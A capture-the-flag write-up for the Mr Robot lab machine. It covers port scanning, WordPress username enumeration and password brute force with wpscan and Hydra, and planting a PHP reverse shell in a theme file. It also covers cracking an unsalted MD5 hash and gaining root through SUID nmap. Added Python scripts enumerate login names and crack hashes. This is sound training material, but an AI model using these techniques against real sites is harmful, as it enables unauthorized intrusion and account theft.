# Write-up

### <mark style="color:purple;">Objectives</mark>

* Find the three hidden keys.
* Gain initial access to the machine.
* Escalate privileges to root.

***

### <mark style="color:purple;">Reconnaissance</mark>

We start by scanning for open ports with **Nmap**:

```bash
nmap -Pn -sCV -F -T5 <ip_victim>
```

The scan reveals:

* **Port 22** (SSH) - *closed*.
* **Port 80** (HTTP) - *open*.
* **Port 443** (HTTPS) - *open*.

Let's focus on **port 80** first. Browsing to `http://<ip_victim>` brings up what looks like a puzzle or game. Time to start digging.

***

### <mark style="color:purple;">Gaining a Shell</mark>

After some exploration, we check for a `robots.txt` file:

```bash
curl -s http://<ip_victim>/robots.txt
```

Inside, we find two interesting entries:

* A file called `fsocity.dic` — a **wordlist**.
* The <mark style="color:purple;">**first key**</mark>!

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXevB-CfS0W7aj6NFr4JOfEbbq5z0cAz816fYLRn_p2XKIaG_3bJIXvjQSqMtPDajk2lHHAldR_CYYr2_TDCoLjsYN0GJuAl54zMQilKcqNoLP4DFHvXt5PivKmt_dVwrVKsXsQeSQ?key=BypX6NmOrwbnC1yyOG3IpFaj" alt=""><figcaption></figcaption></figure>

A wordlist sitting on a web server is a strong hint that **password brute-forcing** is the intended path; what is missing is a login form to point it at.\
One caveat before using it: `fsocity.dic` is heavily duplicated, so deduplicate it first (for example with `sort -u`) or the brute force will take far longer than it needs to.\
To find a target for the brute-force, let's enumerate directories with **Dirbuster** or a similar tool.

Quickly, we discover this is a **WordPress** site (`wp-login.php` present).

Now, let's try enumerating WordPress users with **wpscan**:

```bash
wpscan --url http://<ip_victim> --enumerate u
```

Surprisingly, no luck: wpscan's passive user enumeration turns up nothing.

> **Observation**: Stock WordPress leaks usernames through its login form. For an unknown account it answers *Invalid username*; for a known account with a wrong password it answers *The password you entered for the username X is incorrect*. Valid usernames can therefore be confirmed one request at a time.

By trying names manually (admin, root, mrrobot, fsociety...), **Elliot** is the one that triggers the *different* error.

<figure><img src="https://657071395-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6TULCIQYFngHxc4snxrs%2Fuploads%2FeXBzFiwX2TGQTTJgbOvy%2Fimage.png?alt=media&#x26;token=f3a245ef-9396-4299-ac84-db4ecb11bd81" alt=""><figcaption></figcaption></figure>
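The manual probing above scales badly, so here is an added example in Python (not part of the original write-up) that does the same thing: it classifies a `wp-login.php` response by the two stock WordPress error strings and loops a candidate list against the target. The target URL, the candidate names and the sample HTML bodies used for the offline self-test are assumptions/constructed, not captures from the box.

```python
"""Confirm WordPress usernames via the login form's distinct error messages.

Added example, not from the write-up. The network functions assume a reachable
WordPress site at the URL given on the command line; the sample HTML bodies
below are constructed to mimic the two stock messages, not captured responses.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

# Stock WordPress core login errors: known user + wrong password vs. unknown user.
VALID_USER_MARKER = "The password you entered for the username"
INVALID_USER_MARKERS = ("Invalid username", "Unknown username")


def classify_login_response(html: str) -> str:
    """Map a wp-login.php response body to 'valid-user', 'invalid-user' or 'unknown'."""
    if VALID_USER_MARKER in html:
        return "valid-user"
    if any(marker in html for marker in INVALID_USER_MARKERS):
        return "invalid-user"
    # Neither message: successful login, lockout plugin, WAF block page, etc.
    return "unknown"


def probe_username(base_url: str, username: str, timeout: float = 10.0) -> str:
    """POST a junk password for one username and classify the reply (network call)."""
    form = urllib.parse.urlencode(
        {"log": username, "pwd": "definitely-not-it", "wp-submit": "Log In"}
    ).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/wp-login.php",
        data=form,
        headers={
            "User-Agent": "Mozilla/5.0",
            "Content-Type": "application/x-www-form-urlencoded",
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # keep the body even on a 4xx/5xx answer
        body = err.read().decode("utf-8", "replace")
    return classify_login_response(body)


def enumerate_users(base_url: str, candidates) -> list:
    """Return the candidates the login form acknowledges as existing accounts."""
    return [name for name in candidates if probe_username(base_url, name) == "valid-user"]


# Constructed response bodies mimicking the two WordPress messages (offline self-test).
SAMPLE_INVALID = '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
SAMPLE_VALID = (
    '<div id="login_error"><strong>ERROR</strong>: The password you entered for the '
    'username <strong>Elliot</strong> is incorrect.</div>'
)


def self_test() -> dict:
    """Classify the constructed samples; lets the logic be checked without a target."""
    return {
        "invalid": classify_login_response(SAMPLE_INVALID),
        "valid": classify_login_response(SAMPLE_VALID),
        "other": classify_login_response("<html><body>Dashboard</body></html>"),
    }


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(self_test())
        print("usage: wp_userenum.py http://<ip_victim> [name ...]")
        sys.exit(0)
    names = sys.argv[2:] or ["admin", "root", "mrrobot", "fsociety", "Elliot"]
    print("valid usernames:", enumerate_users(sys.argv[1], names))
```

Run it with no arguments to exercise the classifier on the constructed samples, or with the target URL (and optionally a list of names) to probe a real login form. Each probe is one failed login, so keep the candidate list short against anything with a lockout plugin.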

Thus, we refine our brute-force:

```bash
wpscan --url http://<ip_victim>/ --usernames Elliot --passwords fsocity.dic
```

Or using **Hydra** (the last field is the *failure* string, i.e. the wrong-password message above, so any response that lacks it is reported as a hit):

```bash
hydra -l Elliot -P fsocity.dic <ip_victim> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username" -t 30 -VV
```

Eventually, we find the password:

* **Elliot : ER\*\*\*\*\*\*\***

Now authenticated, let's log into the WordPress admin panel!

Navigating to **Appearance > Theme Editor**, we open the active theme's `404.php`.\
Classic move: replace its contents with the PHP reverse shell from Pentestmonkey, set its `$ip` and `$port` to our listener, and save the file.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXcwKjx64JYEOxjof9gtAHMT9sHOFBdOMFPVOrIvztOCkOwNaUeQb5jpxK8y4DgLl2Yb_qOO7YJid2dRyV5vxGNkVIdtxwg0ujfmySqk0Mqqqq6ETJYJzLC78HFekIMXfSQLDM98Yg?key=BypX6NmOrwbnC1yyOG3IpFaj" alt=""><figcaption></figcaption></figure>

Start a listener:

```bash
nc -lvnp 7777
```

Then trigger the shell by requesting any page that does not exist: WordPress renders the theme's `404.php` for it.

Boom — **reverse shell obtained**!

To upgrade to an interactive TTY (needed later for `su`):

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

***

### <mark style="color:purple;">Privilege Escalation</mark>

Inside the system, `/home/robot/` holds the **second key**, but it is readable only by user `robot`, so we cannot read it yet.

However, a file `password.raw-md5` in the same directory is world-readable.\
As the name says, it contains a raw, unsalted MD5 hash, which makes a lookup-table attack cheap.

Pasting the hash into [**CrackStation**](https://crackstation.net/) returns the password.
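CrackStation is just a precomputed lookup table; the same attack can be run offline against the wordlist we already have. The following Python is an added example, not from the write-up: it parses `hash` or `user:hash` lines, deduplicates a wordlist (the `fsocity.dic` problem again) and tries each candidate. The hash line and wordlist in it are constructed samples (the hash is the MD5 of the string `password`), not the values from the box.

```python
"""Offline dictionary attack against raw (unsalted) MD5 hashes.

Added example, not from the write-up. The sample hash line and wordlist are
constructed for the demo (the digest is MD5("password")); the box's own hash
and password are deliberately not reproduced here.
"""
import hashlib
import sys
from typing import Iterable, Optional, Tuple


def parse_hash_line(line: str) -> Tuple[Optional[str], str]:
    """Accept either '<hex>' or '<user>:<hex>' (the usual raw-md5 dump format)."""
    user, sep, digest = line.strip().rpartition(":")
    return (user if sep else None, digest.lower())


def load_wordlist(lines: Iterable[str]) -> list:
    """Strip line endings and drop duplicate entries, keeping first-seen order."""
    return list(dict.fromkeys(line.rstrip("\r\n") for line in lines))


def crack_raw_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate whose MD5 equals target_hex, or None if none matches."""
    target = bytes.fromhex(target_hex)  # raises ValueError on non-hex input
    if len(target) != 16:
        raise ValueError("an MD5 digest is 16 bytes (32 hex characters)")
    for word in candidates:
        if hashlib.md5(word.encode("utf-8", "surrogateescape")).digest() == target:
            return word
    return None


def crack_lines(hash_lines: Iterable[str], wordlist: Iterable[str]) -> dict:
    """Crack every hash line; keys are the user, or the hex when no user is given."""
    words = load_wordlist(wordlist)  # materialise once so it can be reused per hash
    results = {}
    for line in hash_lines:
        if not line.strip():
            continue
        user, digest = parse_hash_line(line)
        results[user or digest] = crack_raw_md5(digest, words)
    return results


# Constructed sample input: one 'user:hash' line and a tiny, duplicated wordlist.
SAMPLE_HASH_FILE = ["demo_user:5f4dcc3b5aa765d61d8327deb882cf99\n"]
SAMPLE_WORDLIST = ["qwerty\n", "letmein\n", "qwerty\n", "password\n", "dragon\n"]


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # usage: md5crack.py <hash_file> <wordlist>; surrogateescape tolerates odd bytes
        with open(sys.argv[1]) as hashes, open(sys.argv[2], errors="surrogateescape") as words:
            found = crack_lines(hashes, words)
    else:
        found = crack_lines(SAMPLE_HASH_FILE, SAMPLE_WORDLIST)
    for who, plain in found.items():
        print(f"{who}: {plain if plain is not None else '<not in wordlist>'}")
```

Run without arguments for the constructed sample, or pass the hash file and wordlist paths. The deduplication in `load_wordlist` is what turns a bloated list like `fsocity.dic` into something that finishes in seconds; the same trick applies before feeding it to wpscan or Hydra.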

Switching to user **robot** (this is where the TTY we spawned earlier pays off, since `su` refuses to run without one):

```bash
su robot
```

With this, the <mark style="color:purple;">second key</mark> is retrieved!

Now for root access.

Checking binaries with the SUID bit:

```bash
find / -type f -perm -04000 -ls 2>/dev/null
```

We spot **nmap** with the SUID bit set!

Checking its version (`nmap --version`) shows **3.81**. Old nmap releases (up to 5.21) ship an `--interactive` mode whose `!` prefix runs shell commands, and because the binary is SUID root, that shell runs as root too.

Following the **GTFOBins** entry for nmap:

```bash
nmap --interactive
!sh
```

Root shell achieved (`id` shows `euid=0`). Note that `sh` keeps the effective UID; bash would drop it unless started with `-p`.

Searching through the filesystem, the <mark style="color:purple;">**third and final key**</mark> is found.

Mission accomplished!

***

### <mark style="color:purple;">Result</mark>

<mark style="color:blue;">First key</mark>: Found via `robots.txt`\
<mark style="color:blue;">Second key</mark>: Found under `/home/robot/` after switching user\
<mark style="color:blue;">Third key</mark>: Found after privilege escalation using vulnerable SUID `nmap`
